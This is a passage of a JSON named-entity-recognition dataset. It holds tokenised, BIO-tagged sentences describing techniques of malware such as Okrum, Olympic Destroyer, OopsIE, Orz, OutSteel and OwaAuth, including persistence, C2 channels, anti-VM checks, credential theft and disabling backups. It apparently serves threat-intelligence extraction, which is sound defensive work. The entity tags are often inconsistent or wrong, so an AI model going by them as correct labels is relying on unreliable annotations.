"can", - "establish", - "persistence", - "by", - "creating", - "a", - ".lnk", - "shortcut", - "to", - "itself", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "has", - "used", - "base64", - "to", - "encode", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "payload", - "is", - "encrypted", - "and", - "embedded", - "within", - "its", - "loader,", - "or", - "within", - "a", - "legitimate", - "PNG", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "Okrum", - "uses", - "AES", - "to", - "encrypt", - "network", - "traffic.", - "The", - "key", - "can", - "be", - "hardcoded", - "or", - "negotiated", - "with", - "the", - "C2", - "server", - "in", - "the", - "registration", - "phase." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "loader", - "can", - "check", - "the", - "amount", - "of", - "physical", - "memory", - "and", - "terminates", - "itself", - "if", - "the", - "host", - "has", - "less", - "than", - "1.5", - "Gigabytes", - "of", - "physical", - "memory", - "in", - "total." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "collect", - "computer", - "name,", - "locale", - "information,", - "and", - "information", - "about", - "the", - "OS", - "and", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "collect", - "network", - "information,", - "including", - "the", - "host", - "IP", - "address,", - "DNS,", - "and", - "proxy", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "was", - "seen", - "using", - "NetSess", - "to", - "discover", - "NetBIOS", - "sessions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "collect", - "the", - "victim", - "username." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "obtain", - "the", - "date", - "and", - "time", - "of", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "loader", - "can", - "detect", - "presence", - "of", - "an", - "emulator", - "by", - "using", - "two", - "calls", - "to", - "GetTickCount", - "API,", - "and", - "checking", - "whether", - "the", - "time", - "has", - "been", - "accelerated." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "impersonate", - "a", - "logged-on", - "user's", - "security", - "context", - "using", - "a", - "call", - "to", - "the", - "ImpersonateLoggedOnUser", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Okrum", - "loader", - "only", - "executes", - "the", - "payload", - "after", - "the", - "left", - "mouse", - "button", - "has", - "been", - "pressed", - "at", - "least", - "three", - "times,", - "in", - "order", - "to", - "avoid", - "being", - "executed", - "within", - "virtualized", - "or", - "emulated", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "uses", - "HTTP", - "for", - "communication", - "with", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "backdoor", - "has", - "used", - "cmd.exe", - "to", - "execute", - "arbitrary", - "commands", - "as", - "well", - "as", - "batch", - "scripts", - "to", - "update", - "itself", - "to", - "a", - "newer", - "version." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "establish", - "persistence,", - "Okrum", - "can", - "install", - "itself", - "as", - "a", - "new", - "service", - "named", - "NtmSsvc." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "will", - "attempt", - "to", - "clear", - "the", - "System", - "and", - "Security", - "event", - "logs", - "using", - "<code>wevtutil</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "contains", - "a", - "module", - "that", - "tries", - "to", - "obtain", - "stored", - "credentials", - "from", - "web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "overwrites", - "files", - "locally", - "and", - "on", - "remote", - "shares." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "uses", - "the", - "native", - "Windows", - "utilities", - "<code>vssadmin</code>,", - "<code>wbadmin</code>,", - "and", - "<code>bcdedit</code>", - "to", - "delete", - "and", - "disable", - "operating", - "system", - "recovery", - "features", - "such", - "as", - "the", - "Windows", - "backup", - "catalog", - "and", - "Windows", - "Automatic", - "Repair." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "contains", - "a", - "module", - "that", - "tries", - "to", - "obtain", - "credentials", - "from", - "LSASS,", - "similar", - "to", - "Mimikatz.", - "These", - "credentials", - "are", - "used", - "with", - "PsExec", - "and", - "Windows", - "Management", - "Instrumentation", - "to", - "help", - "the", - "malware", - "propagate", - "itself", - "across", - "a", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "attempts", - "to", - "copy", - "itself", - "to", - "remote", - "machines", - "on", - "the", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "will", - "attempt", - "to", - "enumerate", - "mapped", - "network", - "shares", - "to", - "later", - "attempt", - "to", - "wipe", - "all", - "files", - "on", - "those", - "shares." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "uses", - "Windows", - "Management", - "Instrumentation", - "to", - "enumerate", - "all", - "systems", - "in", - "the", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "uses", - "PsExec", - "to", - "interact", - "with", - "the", - "<code>ADMIN$</code>", - "network", - "share", - "to", - "execute", - "commands", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "utilizes", - "PsExec", - "to", - "help", - "propagate", - "itself", - "across", - "a", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "uses", - "the", - "API", - "call", - "<code>ChangeServiceConfigW</code>", - "to", - "disable", - "all", - "services", - "on", - "the", - "affected", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "uses", - "API", - "calls", - "to", - "enumerate", - "the", - "infected", - "system's", - "ARP", - "table." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "will", - "shut", - "down", - "the", - "compromised", - "system", - "after", - "it", - "is", - "done", - "modifying", - "system", - "configuration", - "settings." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Olympic", - "Destroyer", - "uses", - "WMI", - "to", - "help", - "propagate", - "itself", - "across", - "a", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OnionDuke", - "can", - "use", - "a", - "custom", - "decryption", - "algorithm", - "to", - "decrypt", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "OnionDuke", - "has", - "the", - "capability", - "to", - "use", - "a", - "Denial", - "of", - "Service", - "module." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "OnionDuke", - "steals", - "credentials", - "from", - "its", - "victims." - ], - "ner_tags": [ - "B-Way", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OnionDuke", - "uses", - "Twitter", - "as", - "a", - "backup", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OnionDuke", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "compresses", - "collected", - "files", - "with", - "a", - "simple", - "character", - "replacement", - "scheme", - "before", - "sending", - "them", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "compresses", - "collected", - "files", - "with", - "GZipStream", - "before", - "sending", - "them", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "exfiltrates", - "command", - "output", - "and", - "collected", - "files", - "to", - "its", - "C2", - "server", - "in", - "1500-byte", - "blocks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "concatenates", - "then", - "decompresses", - "multiple", - "resources", - "to", - "load", - "an", - "embedded", - ".Net", - "Framework", - "assembly." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "can", - "upload", - "files", - "from", - "the", - "victim's", - "machine", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "has", - "the", - "capability", - "to", - "delete", - "files", - "and", - "scripts", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "can", - "download", - "files", - "from", - "its", - "C2", - "server", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "stages", - "the", - "output", - "from", - "command", - "execution", - "and", - "collected", - "files", - "in", - "specific", - "folders", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "uses", - "the", - "Confuser", - "protector", - "to", - "obfuscate", - "an", - "embedded", - ".Net", - "Framework", - "assembly", - "used", - "for", - "C2.", - "OopsIE", - "also", - "encodes", - "collected", - "data", - "in", - "hexadecimal", - "format", - "before", - "writing", - "to", - "files", - "on", - "disk", - "and", - "obfuscates", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "creates", - "a", - "scheduled", - "task", - "to", - "run", - "itself", - "every", - "three", - "minutes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "uses", - "the", - "SmartAssembly", - "obfuscator", - "to", - "pack", - "an", - "embedded", - ".Net", - "Framework", - "assembly", - "used", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "encodes", - "data", - "in", - "hexadecimal", - "format", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "performs", - "several", - "anti-VM", - "and", - "sandbox", - "checks", - "on", - "the", - "victim's", - "machine.", - "One", - "technique", - "the", - "group", - "has", - "used", - "was", - "to", - "perform", - "a", - "WMI", - "query", - "<code>SELECT", - "*", - "FROM", - "MSAcpi_ThermalZoneTemperature</code>", - "to", - "check", - "the", - "temperature", - "to", - "see", - "if", - "it’s", - "running", - "in", - "a", - "virtual", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "checks", - "for", - "information", - "on", - "the", - "CPU", - "fan,", - "temperature,", - "mouse,", - "hard", - "disk,", - "and", - "motherboard", - "as", - "part", - "of", - "its", - "anti-VM", - "checks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "checks", - "to", - "see", - "if", - "the", - "system", - "is", - "configured", - "with", - "\"Daylight\"", - "time", - "and", - "checks", - "for", - "a", - "specific", - "region", - "to", - "be", - "set", - "for", - "the", - "timezone." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "creates", - "and", - "uses", - "a", - "VBScript", - "as", - "part", - "of", - "its", - "persistent", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "uses", - "the", - "command", - "prompt", - "to", - "execute", - "commands", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OopsIE", - "uses", - "WMI", - "to", - "perform", - "discovery", - "techniques." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "has", - "used", - "Technet", - "and", - "Pastebin", - "web", - "pages", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "gather", - "victim", - "drive", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "overwrite", - "Registry", - "settings", - "to", - "reduce", - "its", - "visibility", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "download", - "files", - "onto", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "perform", - "Registry", - "operations." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Orz", - "strings", - "are", - "base64", - "encoded,", - "such", - "as", - "the", - "embedded", - "DLL", - "known", - "as", - "MockDll." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Orz", - "can", - "gather", - "a", - "process", - "list", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Orz", - "versions", - "have", - "an", - "embedded", - "DLL", - "known", - "as", - "MockDll", - "that", - "uses", - "process", - "hollowing", - "and", - "Regsvr32", - "to", - "execute", - "another", - "payload." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Orz", - "versions", - "have", - "an", - "embedded", - "DLL", - "known", - "as", - "MockDll", - "that", - "uses", - "Process", - "Hollowing", - "and", - "regsvr32", - "to", - "execute", - "another", - "payload." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "gather", - "the", - "victim's", - "Internet", - "Explorer", - "version." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "gather", - "the", - "victim", - "OS", - "version", - "and", - "whether", - "it", - "is", - "64", - "or", - "32", - "bit." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orz", - "can", - "gather", - "victim", - "proxy", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Orz", - "can", - "execute", - "shell", - "commands.", - "Orz", - "can", - "execute", - "commands", - "with", - "JavaScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Out1", - "can", - "copy", - "files", - "and", - "Registry", - "data", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Out1", - "can", - "parse", - "e-mails", - "on", - "a", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Out1", - "has", - "the", - "ability", - "to", - "encode", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Out1", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "in", - "communications", - "with", - "remote", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Out1", - "can", - "use", - "native", - "command", - "line", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "automatically", - "scan", - "for", - "and", - "collect", - "files", - "with", - "specific", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "automatically", - "upload", - "collected", - "files", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "collect", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "upload", - "files", - "from", - "a", - "compromised", - "host", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "delete", - "itself", - "following", - "the", - "successful", - "execution", - "of", - "a", - "follow-on", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "search", - "for", - "specific", - "file", - "extensions,", - "including", - "zipped", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "B-Features" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "download", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "has", - "relied", - "on", - "a", - "user", - "to", - "execute", - "a", - "malicious", - "attachment", - "delivered", - "via", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "OutSteel", - "has", - "relied", - "on", - "a", - "user", - "to", - "click", - "a", - "malicious", - "link", - "within", - "a", - "spearphishing", - "email." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "can", - "identify", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "has", - "been", - "distributed", - "as", - "a", - "malicious", - "attachment", - "within", - "a", - "spearphishing", - "email." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "has", - "been", - "distributed", - "through", - "malicious", - "links", - "contained", - "within", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OutSteel", - "has", - "used", - "`cmd.exe`", - "to", - "scan", - "a", - "compromised", - "host", - "for", - "specific", - "file", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "DES-encrypts", - "captured", - "credentials", - "using", - "the", - "key", - "12345678", - "before", - "writing", - "the", - "credentials", - "to", - "a", - "log", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "has", - "a", - "command", - "to", - "list", - "its", - "directory", - "and", - "logical", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "has", - "been", - "loaded", - "onto", - "Exchange", - "servers", - "and", - "disguised", - "as", - "an", - "ISAPI", - "filter", - "(owaauth.dll).", - "The", - "IIS", - "w3wp.exe", - "process", - "then", - "loads", - "the", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "captures", - "and", - "DES-encrypts", - "credentials", - "before", - "writing", - "the", - "username", - "and", - "password", - "to", - "a", - "log", - "file,", - "<code>C:\\log.txt</code>." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "OwaAuth", - "uses", - "the", - "filename", - "owaauth.dll,", - "which", - "is", - "a", - "legitimate", - "file", - "that", - "normally", - "resides", - "in", - "<code>%ProgramFiles%\\Microsoft\\Exchange", - "Server\\ClientAccess\\Owa\\Auth\\</code>;", - "the", - "malicious", - "file", - "by", - "the", - "same", - "name", - "is", - "saved", - "in", - "<code>%ProgramFiles%\\Microsoft\\Exchange", - "Server\\ClientAccess\\Owa\\bin\\</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - 